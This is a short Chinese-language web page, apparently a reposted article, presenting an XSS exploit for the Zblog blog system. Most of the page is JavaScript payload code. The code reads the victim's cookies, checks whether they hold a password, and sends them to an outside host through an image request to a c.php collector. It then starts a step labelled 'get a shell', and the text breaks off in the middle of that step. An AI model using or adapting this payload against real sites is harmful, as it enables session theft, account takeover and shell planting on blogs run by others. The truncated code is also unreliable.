欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Zblog最新跨站漏洞及利用代码

程序员文章站 2022-07-10 10:34:29
Js里可以写shell,添加用户,偷取COOKIE然后模拟出真正的转向 ... 11-03-11...

  js里可以写shell,添加用户,偷取cookie然后模拟出真正的转向

  xmlhttp=poster();

  cookie=document.cookie;

  login=cookie.indexof(‘password’)==-1?0:1;

  tolocation=’https://www.jb51.net/’;

  //get cookie

  x=new image();

  x.src=”www.dosjj.com/c.php?c=”+escape(document.cookie);

  //get a shell

  data=”txacontent=